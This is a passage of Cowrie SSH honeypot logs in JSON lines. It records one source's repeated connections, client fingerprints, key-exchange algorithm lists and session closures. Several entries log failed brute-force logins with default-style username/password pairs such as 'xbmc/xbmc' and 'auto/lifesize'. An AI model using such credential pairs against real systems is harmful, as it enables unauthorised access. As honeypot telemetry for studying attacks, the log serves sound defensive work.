sh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:21.235790Z","src_ip":"212.227.235.229","session":"05f18d182b70"}
{"eventid":"cowrie.session.closed","duration":30.595953226089478,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:26.377078Z","src_ip":"125.137.76.226","session":"0ad2230353de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34038,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b224cecf270","protocol":"ssh","message":"New connection: 212.227.235.229:34038 (1.2.3.4:22) [session: 1b224cecf270]","sensor":"my-vps","timestamp":"2025-08-28T08:05:27.358938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:27.644254Z","src_ip":"212.227.235.229","session":"1b224cecf270"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34040,"dst_ip":"1.2.3.4","dst_port":22,"session":"33db392fe92c","protocol":"ssh","message":"New connection: 212.227.235.229:34040 (1.2.3.4:22) [session: 33db392fe92c]","sensor":"my-vps","timestamp":"2025-08-28T08:05:27.701928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:28.209767Z","src_ip":"212.227.235.229","session":"33db392fe92c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:28.452102Z","src_ip":"212.227.235.229","session":"33db392fe92c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52372,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe41cc61a52","protocol":"ssh","message":"New connection: 212.227.235.229:52372 (1.2.3.4:22) [session: 7fe41cc61a52]","sensor":"my-vps","timestamp":"2025-08-28T08:05:28.600197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:28.601671Z","src_ip":"212.227.235.229","session":"7fe41cc61a52"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:29.113149Z","src_ip":"212.227.235.229","session":"7fe41cc61a52"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:29.283100Z","src_ip":"212.227.235.229","session":"1b224cecf270"}
{"eventid":"cowrie.login.failed","username":"psybnc","password":"psybnc","message":"login attempt [psybnc/psybnc] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:31.755288Z","src_ip":"212.227.235.229","session":"05f18d182b70"}
{"eventid":"cowrie.login.failed","username":"thomas","password":"thomas","message":"login attempt [thomas/thomas] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:31.973875Z","src_ip":"212.227.235.229","session":"33db392fe92c"}
{"eventid":"cowrie.login.failed","username":"xbmc","password":"xbmc","message":"login attempt [xbmc/xbmc] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:32.186395Z","src_ip":"212.227.235.229","session":"1b224cecf270"}
{"eventid":"cowrie.session.closed","duration":"13.7","message":"Connection lost after 13.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:33.031818Z","src_ip":"212.227.235.229","session":"05f18d182b70"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:33.255553Z","src_ip":"212.227.235.229","session":"33db392fe92c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53690,"dst_ip":"1.2.3.4","dst_port":22,"session":"6979f7d7c867","protocol":"ssh","message":"New connection: 212.227.235.229:53690 (1.2.3.4:22) [session: 6979f7d7c867]","sensor":"my-vps","timestamp":"2025-08-28T08:05:33.726959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:33.765635Z","src_ip":"212.227.235.229","session":"6979f7d7c867"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:33.843010Z","src_ip":"212.227.235.229","session":"1b224cecf270"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:33.985934Z","src_ip":"212.227.235.229","session":"6979f7d7c867"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52430,"dst_ip":"1.2.3.4","dst_port":22,"session":"51975f1242b6","protocol":"ssh","message":"New connection: 212.227.235.229:52430 (1.2.3.4:22) [session: 51975f1242b6]","sensor":"my-vps","timestamp":"2025-08-28T08:05:34.565610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:34.567338Z","src_ip":"212.227.235.229","session":"51975f1242b6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:05:36.841878Z","src_ip":"212.227.235.229","session":"51975f1242b6"}
{"eventid":"cowrie.login.failed","username":"auto","password":"lifesize","message":"login attempt [auto/lifesize] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:37.406694Z","src_ip":"212.227.235.229","session":"6979f7d7c867"}
{"eventid":"cowrie.login.failed","username":"admian","password":"admin","message":"login attempt [admian/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:05:39.079361Z","src_ip":"212.227.235.229","session":"51975f1242b6"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:39.364409Z","src_ip":"212.227.235.229","session":"6979f7d7c867"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:05:45.081341Z","src_ip":"212.227.235.229","session":"51975f1242b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37640,"dst_ip":"1.2.3.4","dst_port":22,"session":"02bed677e315","protocol":"ssh","message":"New connection: 212.227.235.229:37640 (1.2.3.4:22) [session: 02bed677e315]","sensor":"my-vps","timestamp":"2025-08-28T08:05:45.092296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:45.131101Z","src_ip":"212.227.235.229","session":"02bed677e315"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37650,"dst_ip":"1.2.3.4","dst_port":22,"session":"748ed547b7bd","protocol":"ssh","message":"New connection: 212.227.235.229:37650 (1.2.3.4:22) [session: 748ed547b7bd]","sensor":"my-vps","timestamp":"2025-08-28T08:05:45.220345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:05:45.225186Z","src_ip":"212.227.235.229","session":"748ed547b7bd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-